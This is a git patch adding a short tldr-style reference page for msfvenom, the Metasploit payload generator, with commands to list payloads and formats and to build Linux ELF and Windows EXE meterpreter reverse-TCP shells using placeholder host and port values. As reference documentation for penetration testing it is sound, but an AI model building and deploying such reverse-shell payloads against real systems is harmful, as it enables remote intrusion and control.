From 37ffdcb0a799a3f9b47e2bb73d5f0208caedeefe Mon Sep 17 00:00:00 2001 From: Jonathan <1909202+Jab2870@users.noreply.github.com> Date: Sun, 29 Dec 2019 03:06:13 +0000 Subject: [PATCH] msfvenom: add page (#3476) --- pages/common/msfvenom.md | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 pages/common/msfvenom.md diff --git a/pages/common/msfvenom.md b/pages/common/msfvenom.md new file mode 100644 index 0000000000..e6f298a281 --- /dev/null +++ b/pages/common/msfvenom.md @@ -0,0 +1,24 @@ +# msfvenom + +> Manually generate payloads for metasploit. +> More information: . + +- List payloads: + +`msfvenom -l payloads` + +- List formats: + +`msfvenom -l formats` + +- Show payload options: + +`msfvenom -p {{payload}} --list-options` + +- Create an ELF binary with a reverse TCP handler: + +`msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST={{local_ip}} LPORT={{local_port}} -f elf > {{path/to/binary}}` + +- Create an EXE binary with a reverse TCP handler: + +`msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST={{local_ip}} LPORT={{local_port}} -f exe > {{path/to/binary.exe}}`